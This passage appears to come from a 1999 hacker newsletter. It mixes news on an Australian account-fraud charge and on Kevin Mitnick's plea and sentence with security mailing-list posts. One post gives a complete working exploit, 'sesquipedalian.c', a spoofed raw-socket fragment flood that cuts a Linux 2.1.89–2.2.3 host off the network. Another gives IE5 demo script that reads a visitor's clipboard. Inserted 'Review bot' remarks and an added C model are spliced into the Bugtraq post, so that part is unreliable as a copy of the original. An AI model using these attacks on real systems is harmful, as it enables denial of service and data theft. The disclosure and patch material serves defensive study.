fraud amounting to just $50 worth of Net access.

Christopher Thomas Daniels of Cannington has been charged
by the Western Australian major fraud squad for accessing
other people's Internet accounts. He faces 37 counts of
unlawfully operating a computer system.

According to Detective Senior Constable Mike Wheeler,
Daniels admitted to having passwords to more than 350
accounts, but he had used only 37. The accounts were all for
prepaid access from one of Australia's larger ISPs, and the
customers affected were unaware that their accounts had
been accessed.

"The ISP noticed inconsistencies and notified us," said
Wheeler. "But let me say that this kind of problem is not
restricted to just one ISP."


The WA man said he was given the passwords by another
person, a juvenile who will be subject to a different court
system.

Daniels is set to appear in court tomorrow. He faces up to 12
months in jail or a fine of up to $4,000.


This article is located at
http://newswire.com.au/9903/nfraud.htm

@HWA

04.0 Mitnick Updates
~~~~~~~~~~~~~~~

04.1 The Bumper Sticker Stays
~~~~~~~~~~~~~~~~~~~~~~~~
from Chaos theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2229344,00.html


After reflecting on the long, strange case of Kevin Mitnick,
I've decided that the "Free Kevin" bumper sticker's not
coming off my car-- not yet.
By Kevin Poulsen March 22, 1999

After four long years in the house of many doors, 35-year-old Kevin
Mitnick is ready to swallow a bitter pill, plead guilty to some of the
twenty-five felonies on his indictment plate and accept a prison
sentence a few months longer than the time he's already spent in stir.

But I'm not scraping the Free Kevin bumper sticker from my car any time
soon.

The sticker stays because Tuesday's sealed plea agreement is now on the
desk of Judge Mariana Pfaelzer, who may yet reject it as summarily as she
refused to allow him the due process of a bail hearing.

The sticker also stays because Mitnick is still facing a dusty California
state charge from the early '90s which threatens to flip him out of the
frying pan of federal lockup and into the fire of the notorious Los
Angeles County Jail-- better known as Hell.

And even after his eventual release, Mitnick will spend up to three
years in a technophobic virtual prison, barred from touching anything
with a trace of silicon in it.

So the sticker will continue to adorn my bumper as a reminder of the
end of an era, and the dawn of a new and harsh morning. Kevin grew up
to the extent that he did at a time when computers were still seen as
mysterious and arcane, and exploring them was an innocent and joyful
pastime for a few privileged youngsters. There was no talk of cyber-
terrorism then; no suggestion that teenage technophiles were foreign
operatives acting to overthrow the government. Kids who weren't old
enough to drive were manipulating dizzying technology from their own
bedrooms, and it was magic, pure and simple.

Kevin Mitnick was already a legendary magician when I got my first
computer in the early '80s. In today's Internet age, talentless
teenaged taggers make national headlines by using pre-fab cracking
tools to deface sitting-duck websites. So it takes some imagination
to understand the genuine skill and artistry possessed by the
likes of Kevin.

He gained his knowledge from dumpsters and libraries and by tricking
the guardians of technology with telephone con games. Applying that
knowledge, doing things that weren't supposed to be possible, required
creativity, resourcefulness, and tools that couldn't simply be downloaded.

He was the archetypal trickster, sharing the joy of discovery with
friends and loved ones through ingenious pranks; his hapless victims
usually ended up too impressed with the magic to be overly annoyed
with the inconvenience. While it seems inconceivable now, Mitnick didn't
even cloak his efforts under a pseudonym. He was simply Kevin Mitnick.

There was no reason to hide because what he was doing wasn't a crime.
Nobody even minded much at first. It was all good clean fun.

The Playground's Closed

Then the world began to change, while Kevin remained the same.
Communism died, and a notional hacker threat replaced the red
menace as the enemy of everything good, decent, and American.

The Internet took off in the early '90s, and pressure grew in
Congress to make cyberspace safe for shopping. Computers
were no longer the billion-dollar brains controlling our lives;
instead they were on our desks and in our homes, and no one
liked the idea that people like Kevin might get into them and
muck around.

Suddenly, the hacking that everyone around him thought was
clever, amusing, and harmless during Mitnick's formative years
became "computer fraud and abuse." Examining computer source
code became "theft of proprietary information," and was equated
to stealing money from a bank.

Before he knew it, Kevin was a "danger to the community," held
without bail like a murderer. And his rights were given the
treatment normally reserved for accused drug kingpins. He was soon
in front of an openly hostile court, facing the full brunt of a
federal prosecution, as he watched the seasons change through the
semitransparent polymer slits that pass for jailhouse windows.

There was never any doubt that Kevin was guilty of at least some
of the charges against him. There was never any doubt that he
caused a lot of innocent people some serious hassles, and he needed
to be slapped down. That was never really the point. The "Free Kevin"
bumper sticker is on my car because every day that he spends locked
up raises the punitive bar of zero tolerance another notch.

Kevin Mitnick never damaged anything. He never stole a dime, never
tried to profit from his efforts. He remained a laughing Peter Pan,
while the world changed. I suspect he never really understood that
his victims were no longer laughing along with him. He never lost
his innocence.

The sticker is there as a reminder of the new paradigm that punishes
dumb innocence more severely than true guilt, more harshly than fraud,
theft, and robbery. The sticker is there because jail does a slow
violence to a person, and Kevin Mitnick didn't deserve four years of
that violence.


-=-

-=-


04.2 Mitnick's Judgment Day at Hand
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Douglas Thomas

9:00 a.m. 25.Mar.99.PST
LOS ANGELES -- Celebrity cracker Kevin Mitnick will appear before US
District Court Judge Mariana Pfaelzer on Friday for what could be the
last time. Pfaelzer is scheduled to rule on a plea agreement jointly
submitted by the government and defense team attorneys. Although neither
side has discussed the details, a report leaked last week said Mitnick
will plead guilty in exchange for a reduced sentence. The arrangement
reportedly calls for Mitnick to spend at least an additional year in
prison.

Mitnick, in custody since 1995, is charged with copying proprietary
software from the computers of cellular telephone manufacturers. Over
the years, he has grown to be the cause célèbre of hackers and crackers
the world over. Friday's scheduled appearance won't be the first time
that Pfaelzer has considered a plea agreement from Mitnick.

In 1989, Mitnick pleaded guilty to possessing unauthorized long-distance
codes and copying security software from the Digital Equipment Corporation.
Pfaelzer rejected a plea bargain in that case, and Mitnick spent a year in
prison and six months in a halfway house.

If Pfaelzer accepts the current plea, it would mean the end of the federal
indictment. Mitnick, however, still faces state charges stemming from a
1993 arrest. He is accused of fraudulently obtaining information from the
Department of Motor Vehicles and faxing it to a copy shop in Los Angeles.

If found guilty, Mitnick could face up to four years of additional prison time.


04.3 Why We Still Have to Free Kevin Mitnick...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Update from <a href="http://www.kevinmitnick.com/home.html">www.kevinmitnick.com</a>

Why We Still Have to Free Kevin Mitnick...
Assistant US Attorneys Defy Court Order Again

March 30, 1999

So Kevin Mitnick has pleaded guilty and reached an agreement with the federal
authorities. The story is over. Thanks for participating. You can all go home
now.

Not so fast.

If you've ever been robbed at gunpoint, you know the feeling of wanting to
resist, but then giving up your valuables because you feared the consequences
of what would happen if you resisted more vigorously. We all want to be heroes,
but there comes a time when one needs to make a painful sacrifice in order to
survive at all.

For more than four years, Kevin has held firm in prison, maintaining his
innocence while trying to build a defense against the government's charges. The
process of constructing such a case is a monumental one, even for highly paid
defense attorneys. Now add to the mix the reality of being held captive in a
federal prison that limits your "participation" in your defense to 20 minute
collect phone calls and five hours per week in an inadequate law library, and
you may begin to see what it was like.

Not there yet? Kevin's legal team was overworked and underfunded whereas the
prosecution had unlimited resources and as much time as they needed, not to
mention a compliant court that granted them every excuse for their manipulation
of the facts and circumstances in this case.

Government Defiance of Court Order

Apparently unwilling to miss the opportunity to kick someone while they're
down, government prosecutors David Schindler and Christopher Painter have
walked through Alice's looking glass and turned the law on its head once again
-- they have instructed the legal staff at the Metropolitan Detention Center
(MDC) that Kevin will no longer need access to the laptop computer that Kevin
has been using to prepare his defense; first for the trial, and now for the
sentencing hearing scheduled for June 14, 1999. Here are the circumstances:

The legal staff at MDC supervises the prison's compliance with all legal matters
affecting the prison. Kevin and his legal team convene in the attorney's visiting
room at MDC to use a laptop computer to review the electronic evidence in Kevin's
case. Kevin is currently reviewing that evidence to counter the government's
likely arguments in support of restitution requirements, which in turn are based
upon fictional losses alleged to have been suffered by the alleged victims in this
case.

Illegal Interference by Government

On Monday, March 29, Kevin met his legal team in the visiting room, where they were
going to use the laptop computer to review evidence in preparation for Kevin's
sentencing hearing on June 14. After waiting two hours, Kevin was informed that
either Assistant U.S. Attorneys Schindler or Painter had incorrectly advised MDC
Legal Staff that Kevin would "no longer be needing access to the computer," and
consequently, Kevin would not be permitted access to the laptop in order to prepare
for his sentencing hearing.

Defense Attorney Asserts Federal Court Order

One member of Kevin's defense team (standing in for attorney Don Randolph, Kevin's
attorney of record in this case who is currently on vacation) asserted unequivocally
that there is a federal court order in place with the MDC ordering -- not suggesting,
but ordering -- the MDC to provide access to a laptop computer for Kevin and his legal
staff.

Government's "Logic" Defies Justification

Logic would suggest that if government prosecutors object to a federal court order,
it is their responsibility to petition the court for redress. The actions by the
government are an attempt to turn the situation on its head, and constitute an
apparent effort by AUSAs Schindler and/or Painter to unlawfully influence the
behavior of the legal staff of MDC. In addition, they may have known that Kevin's
lead defense attorney was scheduled to be out of town this week, thus increasing
the likelihood that they would succeed in delaying Kevin's access to the evidence
against him.

Prosecutors in Direct Violation of Court Order

Actions by AUSAs Schindler and/or Painter to manipulate legal staff at MDC are in
direct violation of a federal court order by Judge Mariana Pfaelzer ordering
the MDC to provide a laptop computer to Kevin Mitnick. Their actions are in violation
of federal law, and at this difficult stage of Kevin's case, can have no other
purpose than to interfere with Kevin's right to participate fully in his defense.

Call Your Congresspeople and Local Media

We urge you to call your United States Representative and Senator as well as your
local news media to alert them to the apparently willful violation of a federal
court order by sworn officers of the court. Calls to the office of Rep. Henry
Waxman (D-CA) may prove especially helpful.


@HWA

04.4 Mitnick gets 46 months?
~~~~~~~~~~~~~~~~~~~~~~~

Mitnick Sentenced to 46 Months
by Douglas Thomas

3:00 a.m. 29.Mar.99.PST
The case is not closed on Kevin Mitnick, who was sentenced Friday to 46 months
in prison after pleading guilty to seven counts of wire and computer fraud.
The notorious cracker still faces California charges for computer fraud.

US District Judge Mariana Pfaelzer accepted Mitnick's guilty plea to five of 25
federal counts of fraud plus two counts of fraud in Northern California.

No date has been set for a trial on Southern California charges, which stem from
a 1993 arrest in which Mitnick was accused of fraudulently obtaining information
from the Department of Motor Vehicles. If convicted of those charges, he could
face an additional four years behind bars.

Friday's plea agreement set total damages of up to US$10 million. Prosecutors and
defense lawyers could not reach agreement on restitution, which will be determined
at Mitnick's sentencing hearing, scheduled for 14 June. Final motions and a pre-
sentence investigation report are due by 1 June.

Mitnick has already spent 48 months in a Los Angeles detention center, including 14
months for violating conditions of his supervised release. He could be released to a
halfway house this fall.

But US Attorney David Schindler said Mitnick would be in prison "at least through next
year."


Don Randolph, Mitnick's attorney, said his client was relieved to have his federal
case resolved. In a prepared statement, Randolph said, "[Mitnick] can now see light at
the end of the tunnel, and has a reasonable certainty that it is not another train approaching."


@HWA

05.0 Sesquipedalian.c 0 length connection resetting exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 23:19:37 -0500
From: John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@netspace.org
Subject: DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug

Hi,

The recent release of the Linux 2.2.4 kernel fixed a remote denial of
service problem in the IP fragment handling code. If you are running a
Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to
get the latest version. In case that isn't feasible for you, I've included
a patch in this post. The impact of this problem is that a remote attacker
can effectively disable a target's IP connectivity. However, for the
attack to succeed, the attacker will have to deliver several thousand
packets to the target, which can take up to several minutes. A quick
exploit and the patch are appended to the end of this post.

The problem starts in ip_glue() in ip_fragment.c:

        /* Copy the data portions of all fragments into the new buffer. */
        fp = qp->fragments;
        count = qp->ihlen;
        while(fp) {
                if ((fp->len < 0) || ((count + fp->len) > skb->len))
                        goto out_invalid;
                memcpy((ptr + fp->offset), fp->ptr, fp->len);
                if (count == qp->ihlen) {
                        skb->dst = dst_clone(fp->skb->dst);
                        skb->dev = fp->skb->dev;
                }
                count += fp->len;
                fp = fp->next;
        }

The problem in this code is that if you can get a fragment into the
qp->fragments list that has a length of 0, and is the first fragment in the
list, then the call to dst_clone() will happen an extra time. The first time
through the loop, count will necessarily equal qp->ihlen, causing
dst_clone() to be called. However, if fp->len happens to equal 0, then count
+= fp->len won't increase it, and the next time through the loop, count will
still equal qp->ihlen. dst_clone() increments a usage count on an element in
the routing cache. Our 0 length fragment will cause this element in the
cache to become stranded. The kernel will not free it when it does the
garbage collection of the cache because it will think it is currently in
use.

The other component of the problem is that the call to allocate a new entry
in the routing cache does a check to see if the hashtable that comprises the
cache is at a saturated state. If it is, it proceeds to do a garbage
collection. If the number of entries in the cache, after this garbage
collection, is still higher than the threshold, then dst_alloc() will fail.
So, if we generate enough stranded entries in the routing cache (4096 in
2.2.3) via our malicious frags, then all further calls to dst_alloc will
fail.

We can get a 0 length fragment into the head of the list by doing the
following:

Send a fragment at offset 0, with a length of X, and IP_MF set. This creates
our list.

Send a 0 length fragment at offset 0, where the ip header length is equal to
the ip total length, and IP_MF is set. This will be treated as coming before
the fragment already in our list, because it has an offset equal to the
offset of the existing fragment. It doesn't overlap any, because its end is
equal to the following fragment's offset.

Send a fragment at offset X, with IP_MF not set. This will mark the end of
our set of fragments. ip_done() will return true because it will see the
first frag going from 0 to 0, the second going from 0 to X, and the third
going from X to the end. Our fragments will get passed into ip_glue().

-horizon

Here is the patch:

--- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
* xxxx : Overlapfrag bug.
* Ultima : ip_expire() kernel panic.
* Bill Hawes : Frag accounting and evictor fixes.
+ * John McDonald : 0 length frag bug.
*/

#include <linux/types.h>
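Review bot: the new changelog line "John McDonald : 0 length frag bug." names the bug but not what was done about it. The neighbouring entries ("Overlapfrag bug.", "Frag accounting and evictor fixes.") are just as terse, so this is consistent with the file's style, but a few more words, for example "0 length frag bug (extra dst_clone in ip_glue)", would let a reader tie this entry to the one-line change in the next hunk without re-reading the analysis.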
@@ -357,7 +358,7 @@
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
- if ((fp->len < 0) || ((count + fp->len) > skb->len))
+ if ((fp->len <= 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
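Review bot: changing `fp->len < 0` to `fp->len <= 0` does close the double dst_clone() described above, since a zero-length fragment at the head of the list now takes the out_invalid path before the `count == qp->ihlen` test can come true a second time. Two points to confirm before merging: the out_invalid label is outside this hunk, so check that it releases the dst reference already taken when the zero-length fragment is not the first one in the list (by then dst_clone() has run once); and the test fires only at reassembly time, so a zero-length fragment is still accepted into qp->fragments and held there until the datagram completes or the queue expires, which this patch does not change.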

And here is the exploit:

/*
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
*
* by horizon <jmcdonal@unf.edu>
*
* This sends a series of IP fragments such that a 0 length fragment is first
* in the fragment list. This causes a reference count on the cached routing
* information for that packet's originator to be incremented one extra time.
* This makes it impossible for the kernel to deallocate the destination entry
* and remove it from the cache.
*
* If we send enough fragments such that there are at least 4096 stranded
* dst cache entries, then the target machine will no longer be able to
* allocate new cache entries, and IP communication will be effectively
* disabled. You will need to set the delay such that packets are not being
* dropped, and you will probably need to let the program run for a few
* minutes to have the full effect. This was written for OpenBSD and Linux.
*
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>     /* bcopy, bzero */
#include <unistd.h>
#include <time.h>        /* time() for seeding random() */
#include <sys/types.h>   /* u_short */
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

struct my_ip_header
{
    unsigned char  ip_hl:4,         /* header length */
                   ip_v:4;          /* version */
    unsigned char  ip_tos;          /* type of service */
    unsigned short ip_len;          /* total length */
    unsigned short ip_id;           /* identification */
    unsigned short ip_off;          /* fragment offset field */
#define IP_RF      0x8000           /* reserved fragment flag */
#define IP_DF      0x4000           /* dont fragment flag */
#define IP_MF      0x2000           /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    unsigned char  ip_ttl;          /* time to live */
    unsigned char  ip_p;            /* protocol */
    unsigned short ip_sum;          /* checksum */
    unsigned long  ip_src, ip_dst;  /* source and dest address */
};

struct my_udp_header
{
    unsigned short uh_sport;
    unsigned short uh_dport;
    unsigned short uh_ulen;
    unsigned short uh_sum;
};

#define IHLEN (sizeof (struct my_ip_header))
#define UHLEN (sizeof (struct my_udp_header))

#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif

/* One's-complement sum over the buffer; the accumulator must start at 0
   (it was left uninitialised in the posted version). */
unsigned short checksum(unsigned short *data, unsigned short length)
{
    register long value = 0;
    u_short i;

    for (i = 0; i < (length >> 1); i++)
        value += data[i];

    if ((length & 1) == 1)
        value += (data[i] << 8);

    value = (value & 65535) + (value >> 16);

    return (~value);
}

/* Accept a dotted quad or a host name and return the address in network order. */
unsigned long resolve(char *hostname)
{
    long result;
    struct hostent *hp;

    if ((result = inet_addr(hostname)) == -1)
    {
        if ((hp = gethostbyname(hostname)) == 0)
        {
            fprintf(stderr, "Can't resolve target.\n");
            exit(1);
        }
        bcopy(hp->h_addr, &result, 4);
    }
    return result;
}

void usage(void)
{
    fprintf(stderr, "usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
    exit(0);
}


/* Send the three-fragment sequence described in the post for one source address. */
void sendem(int s, unsigned long source, unsigned long dest,
            unsigned short sport, unsigned short dport)
{
    static char buffer[8192];
    struct my_ip_header *ip;
    struct my_udp_header *udp;
    struct sockaddr_in sa;

    bzero(&sa, sizeof(struct sockaddr_in));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(sport);
    sa.sin_addr.s_addr = dest;

    bzero(buffer, IHLEN + 32);

    ip = (struct my_ip_header *)buffer;
    udp = (struct my_udp_header *)&(buffer[IHLEN]);

    ip->ip_v = 4;
    ip->ip_hl = IHLEN >> 2;
    ip->ip_tos = 0;
    ip->ip_id = htons(random() & 0xFFFF);
    ip->ip_ttl = 142;
    ip->ip_p = IPPROTO_UDP;
    ip->ip_src = source;
    ip->ip_dst = dest;
    udp->uh_sport = htons(sport);
    udp->uh_dport = htons(dport);
    udp->uh_ulen = htons(64 - UHLEN);
    udp->uh_sum = 0;

    /* Our first fragment will have an offset of 0, and be 32 bytes
       long. This gets added as the only element in the fragment
       list. */

    ip->ip_len = htons(IHLEN + 32);
    ip->ip_off = htons(IP_MF);
    ip->ip_sum = 0;
    ip->ip_sum = checksum((u_short *)buffer, IHLEN + 32);

    if (sendto(s, buffer, IHLEN + 32, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    {
        perror("sendto");
        exit(1);
    }

    /* Our second fragment will have an offset of 0, and a 0 length.
       This gets added to the list before our previous fragment,
       making it first in line. */

    ip->ip_len = htons(IHLEN);
    ip->ip_off = htons(IP_MF);
    ip->ip_sum = 0;
    ip->ip_sum = checksum((u_short *)buffer, IHLEN);

    if (sendto(s, buffer, IHLEN + EXTRA, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    {
        perror("sendto");
        exit(1);
    }

    /* Our third and final frag has an offset of 4 (32 bytes), and a
       length of 32 bytes. This passes our three frags up to ip_glue. */

    ip->ip_len = htons(IHLEN + 32);
    ip->ip_off = htons(32 / 8);
    ip->ip_sum = 0;
    ip->ip_sum = checksum((u_short *)buffer, IHLEN + 32);

    if (sendto(s, buffer, IHLEN + 32, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    {
        perror("sendto");
        exit(1);
    }
}

int main(int argc, char **argv)
{
    int sock;
    int on = 1, i;
    unsigned long source, dest;
    unsigned short sport = 53, dport = 16384;
    int delay = 20000, count = 15000;

    if (argc < 3)
        usage();

    while ((i = getopt(argc, argv, "s:d:n:u:")) != -1)
    {
        switch (i)
        {
        case 's': sport = atoi(optarg);
                  break;
        case 'd': dport = atoi(optarg);
                  break;
        case 'n': count = atoi(optarg);
                  break;
        case 'u': delay = atoi(optarg);
                  break;
        default:  usage();
        }
    }

    argc -= optind;
    argv += optind;

    source = resolve(argv[0]);
    dest = resolve(argv[1]);

    srandom(time((time_t *)0) * getpid());

    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("socket");
        exit(1);
    }

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)
    {
        perror("setsockopt: IP_HDRINCL");
        exit(1);
    }

    fprintf(stdout, "\nStarting attack on %s ...", argv[1]);

    for (i = 0; i < count; i++)
    {
        sendem(sock, source + htonl(i), dest, sport, dport);
        if (!(i % 2))
            usleep(delay);
        if (!(i % 100))
        {
            if (!(i % 2000))
                fprintf(stdout, "\n");
            fprintf(stdout, ".");
            fflush(stdout);
        }
    }

    fprintf(stdout, "\nDone.\n");
    exit(1);
}

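The reference-count leak that the post explains, modelled as an added C example (this is not kernel code and not part of horizon's post): it walks the three-fragment sequence through the 2.2.3 ip_glue() loop with the original `fp->len < 0` test and with the patched `fp->len <= 0` test, then reports how many references the routing-cache entry is left holding after the reassembled datagram is freed. The list, dst and refcount structures, and the names `glue` and `stranded_refs`, are the example's own simplifications.

```c
/* Added model of the 2.2.3 ip_glue() walk described in the post; this is
 * not kernel code. The fragment list, the dst entry and its reference
 * count are simplified stand-ins for the real structures. */
#include <stdio.h>
#include <stddef.h>

/* Stand-in for a routing-cache entry. The cache itself owns the entry;
 * refcnt counts extra holders (reassembled datagrams). Garbage collection
 * is modelled as only being able to free an entry whose refcnt is 0. */
struct dst_entry {
    int refcnt;
};

/* One queued fragment, already sorted by offset as in qp->fragments. */
struct fragment {
    int offset;              /* byte offset of the data in the datagram */
    int len;                 /* data length; 0 is the malformed case */
    struct dst_entry *dst;   /* route cached when this fragment arrived */
    struct fragment *next;
};

static struct dst_entry *dst_clone(struct dst_entry *d) { d->refcnt++; return d; }
static void dst_release(struct dst_entry *d) { d->refcnt--; }

/* The reassembly loop. reject_zero == 0 uses the original test (fp->len < 0),
 * reject_zero == 1 the patched one (fp->len <= 0). Returns the dst the
 * reassembled datagram holds, or NULL when the fragment set is rejected. */
static struct dst_entry *glue(struct fragment *fp, int ihlen, int skb_len,
                              int reject_zero)
{
    struct dst_entry *held = NULL;
    int count = ihlen;

    while (fp) {
        int bad_len = reject_zero ? (fp->len <= 0) : (fp->len < 0);
        if (bad_len || (count + fp->len) > skb_len)
            goto out_invalid;
        /* memcpy of the payload omitted: the bug is in the bookkeeping. */
        if (count == ihlen)          /* intended to be true only once */
            held = dst_clone(fp->dst);
        count += fp->len;            /* does not advance when fp->len == 0 */
        fp = fp->next;
    }
    return held;

out_invalid:
    if (held)                        /* freeing the partial skb drops its ref */
        dst_release(held);
    return NULL;
}

/* Build the three-fragment sequence from the post (a 0-length fragment at
 * offset 0, a 32-byte fragment at offset 0, a final 32-byte fragment at
 * offset 32), or a well-formed two-fragment datagram when with_zero is 0,
 * reassemble it, free the result, and report the cache entry's reference
 * count afterwards. Anything other than 0 is a stranded entry. */
int stranded_refs(int reject_zero, int with_zero)
{
    const int ihlen = 20;                 /* IP header with no options */
    struct dst_entry dst = { 0 };
    struct fragment last  = { 32, 32, &dst, NULL };
    struct fragment first = { 0, 32, &dst, &last };
    struct fragment zero  = { 0, 0, &dst, &first };
    struct fragment *list = with_zero ? &zero : &first;
    struct dst_entry *held = glue(list, ihlen, ihlen + 64, reject_zero);

    if (held)
        dst_release(held);                /* datagram delivered and freed */
    return dst.refcnt;
}

int main(void)
{
    printf("original check, malformed set : %d leaked ref(s)\n", stranded_refs(0, 1));
    printf("patched check,  malformed set : %d leaked ref(s)\n", stranded_refs(1, 1));
    printf("original check, normal set    : %d leaked ref(s)\n", stranded_refs(0, 0));
    printf("patched check,  normal set    : %d leaked ref(s)\n", stranded_refs(1, 0));
    return 0;
}
```

With the original test the malformed set leaves one reference behind, which is the per-source leak the post multiplies up to the 4096-entry garbage-collection threshold; the patched test rejects the set before any reference is taken and leaves normal reassembly unchanged.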

@HWA

06.0 Yet more MSIE5 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 12:11:09 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IE 5 security vulnerabilities


Greetings,

Microsoft delivers with IE 5 an Active X control called "DHTML
Edit control Safe for Scripting for IE 5". In my opinion this
control IS NOT SAFE AT ALL. I have found two vulnerabilities
in this component: it makes public the clipboard and it allows
cross-frame access.
IE 4 is also affected as far as the control is a signed component
and the browser will download it from the MS site (see below my
comments about the CLSID).
Demos are available at
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

I will briefly try to summarize the implications of these issues:

1- The hole makes public the clipboard.
There is nothing new here. This is the third time I have reported
this kind of vulnerability. MS says that this issue can be
blocked by setting the "Allow paste operations via script" to
'prompt'. This security option is set to 'enable' by default
(Medium security). IE 4 does not have this option and there is no
way to avoid the exploit.

2- The hole allows cross-frame access
The first Internet browser security rule is: scripts can only
interact with documents of the same domain and protocol. MS calls
this the cross-frame security; Netscape refers to this rule as
"The same origin security policy". DHTML Editor violates this
rule and allows "transaction spoofing": a malicious script can
submit transactions without the user's knowledge. I have asked my
lawyer consultant about the issue and their response was:
"Nobody can anymore use the IP address as a proof of an Internet
crime against Internet Explorer users". MS says: "We don't see
that this constitutes a security issue".

3- Even if Microsoft fixes the hole, the hole could exist forever. Why?
As far as I know this is the first time a hole is "SIGNED". MS
has released a "dhtmed.cab" file as an ActiveX component signed
by Microsoft; anybody can distribute this file and the victim will
only see a message telling him that the component is "Microsoft
signed". I trust MS, everybody trusts MS, we will accept the ActiveX.
MS has invented a very clever method to sign software, but there is
not a way to revoke the signature.

4- There is something rare in the CLSID
Whenever an HTML page references a not registered CLSID nothing
happens, just the object is not created. The "DHTML Edit Control"
CLSID (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) is very special:
Internet Explorer (4 and 5) will try to download the component from
MS even if CODEBASE is not defined for the object. Is this a
documented feature? You can test this behaviour: unregister the
component "dhtmle.ocx" (using regsvr32.exe) and then load the page
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html
Why does the browser decide to go to the MS site? It only knows:
clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A
According to MS documentation a CODEBASE parameter must be
explicitly set in the OBJECT "object" to download the component.
Any idea?

Regards,
Cuartango

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

The DHTML Editor holes

Microsoft delivers with IE 5 an ActiveX control called DHTML edit control.
The Microsoft Dynamic HTML (DHTML) Editing Component allows Web authors and
application developers to add WYSIWYG DHTML editing capabilities to their Web
sites and applications. The control has two versions: DHTML Edit Control for
IE 5 and DHTML Edit Control Safe for Scripting for IE 5

The first one is of course marked as not safe for scripting and you will be
warned if an HTML page contains this object.
The problem I have found: the second one is not safe at all. "DHTML Edit
Control Safe for Scripting for IE 5" has in fact at least two security holes:

1- It makes public your clipboard (demo).

According to Microsoft security rules, access to Windows clipboard content is
forbidden to Internet Explorer scripts unless the clipboard content was owned
by the Explorer itself. This issue represents an important privacy leak.

Workaround: Set security option "Allow paste operations via script" to "prompt".


2- It allows "cross-frame" access (demo).

An HTML page or frame can read/write contents in frames owned by any domain,
which is forbidden by cross-frame security rules. And still worse, it allows
transaction spoofing. This is a very serious danger. The Safe version of the
ActiveX is not able to navigate but it can SUBMIT FORMS, which means that a
malicious WEB page (or E-Mail) can perform transactions against any WEB site
but YOU will be responsible because the transaction will have your own IP address.

IE 4 is also affected if you accept the download of the ActiveX (Signed by Microsoft)

Last update March 24, in the Year of Our Lord 1999

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html

<html>

<head>
<meta name="keywords"
content="cuartango,dhtmle hole,dhtmle hole,IE5,IE 5 hole,IE 5,cuartango hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>DHTMLE Clipboard vulnerability</title>
</head>

<body>
<script>
function getcb()
{
dh.DOM.body.innerHTML=""
dh.execCommand(5032);
S1.value = dh.DOM.body.innerText;
}
</script>


<p align="center"><big><big><strong><font color="#FF0000">DHTML Editor Clipboard
vulnerability</font></strong></big></big></p>

<p align="left"><font face="Arial"><small>According to Microsoft security rules, access
to Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If a script performs a
"paste" operation over an input text box the operation will succeed only if data
were copied to the clipboard from the Internet Explorer.</small> <small>The DHTMLE editor
delivered with Internet Explorer 5 violates the clipboard security rule. The clipboard
data can then be transferred to a form input box and posted to a malicious WEB.</small></font></p>

<p align="center"><font face="Arial"><br>
<small>To see the demo "copy" some text (from any application) and click the
button below :</small><br>
</font><input type="button" value="Paste" name="B1" onclick="getcb()"></p>

<p align="center"><strong><small><font face="Arial">The box below is a Input Text
Area Box your clipboard text data should be here</font></small></strong><textarea rows="4"
name="S1" cols="80"></textarea></p>

<p align="center"><font face="Arial"><strong><small>The box below is</small></strong></font>
<font face="Arial"><strong><small>"DHTML Edit Control Safe for Scripting for IE 5"</small><br>
</strong></font>
<object id="dh" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="747"
height="105">
</object>
</p>
<div align="center"><center>

<table border="0" width="368" style="border: 1px solid" bgcolor="#C0C0C0">
<tr>
<td width="364"><p align="left"><font face="Arial"><strong><small>The script making public
the clipboard is very simple :</small></strong><br>
<br>
</font><font COLOR="#000000" size="3">function getcb()<br>
{<br>
dh.DOM.body.innerHTML=""; // clear body<br>
dh.execCommand(5032); // paste<br>
S1.value = dh.DOM.body.innerText; // copy to text area<br>
}</font></td>
</tr>
</table>
</center></div>

<p align="center"><a href="dhtmle1.html"><font face="Arial">Back to DTHMLE Vulnerabilities<br>
</font></a><font COLOR="#000000" face="Courier New" size="2"><br>
</font><font color="#400040">Created by</font> <a href="mailto:cuartangojc@mx3.redestb.es">Juan
Carlos Garcia Cuartango</a> </p>

